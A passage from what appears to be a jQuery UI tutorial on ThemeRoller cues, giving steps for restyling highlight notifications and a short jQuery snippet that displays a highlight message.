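  .mousedown(function () { $(this).addClass('ui-state-active'); })
  .on('mouseup mouseleave', function () { $(this).removeClass('ui-state-active'); });
```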
Cues

In any web application, it is important to have the ability to notify users of events that have taken place. Perhaps an order was successfully processed, or a registration field was entered incorrectly; both occurrences are worth letting the user know about. These are types of cues. The jQuery UI theming framework defines two types of cues used to notify the user: highlights and errors. A highlight cue is informational, something that needs to be brought to the user's attention. An error is something exceptional that should not have happened. Both cue categories can be customized to meet the requirements of any theme.

It is important to keep in mind that cues are meant to aggressively grab the attention of the user, not to passively display information, so the theme styles applied to these elements really stand out. In this section we'll take a look at how to make this happen with ThemeRoller.

Time for action - changing the highlight cue

A user of your jQuery UI application has just saved something. How do they know it was successful? Your application needs to inform them somehow; it needs to highlight the fact that something interesting just happened. To do this, your application will display a highlight cue. Let's add some highlight styles to our theme:

1. Continuing with our theme design, expand the Highlight section.
2. In the Background color & texture section, change the color setting value to #faf2c7.
3. In the Background color & texture section, change the opacity setting value to 85%.
4. Change the Border color setting value to #f8df49.
5. Change the Text color setting value to #212121.

What just happened?

The theme settings for any highlight cues we display to the user have been updated. The background color is a shade darker and the opacity has been increased by 10%. The border color is now significantly darker than the background color; the contrast between the background and border colors defined here is now better aligned with the background-border contrast defined in other theme sections. Finally, we've updated the text color to be the same as the text in other sections. This makes no noticeable difference, but keeps the theme consistent. In the ThemeRoller preview, compare the sample highlight cue before and after the theme setting changes.
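To display a highlight cue in an application, you give an element the ui-state-highlight class (errors use ui-state-error). A minimal jQuery sketch of the save confirmation described above, assuming a hypothetical #messages container element:

```javascript
// Build an informational cue styled by the theme's Highlight settings.
// ui-state-highlight, ui-corner-all, and ui-icon-info are standard
// jQuery UI CSS framework classes.
var cue = $('<div>', { 'class': 'ui-state-highlight ui-corner-all' })
  .css('padding', '0.5em')
  .append($('<span>', { 'class': 'ui-icon ui-icon-info' })
    .css({ 'float': 'left', 'margin-right': '0.3em' }))
  .append('Your changes were saved successfully.');

cue.prependTo('#messages'); // #messages is a hypothetical container element
```

Because the cue borrows its colors from the theme, the settings chosen above guarantee it stands out against the content styles without clashing with them.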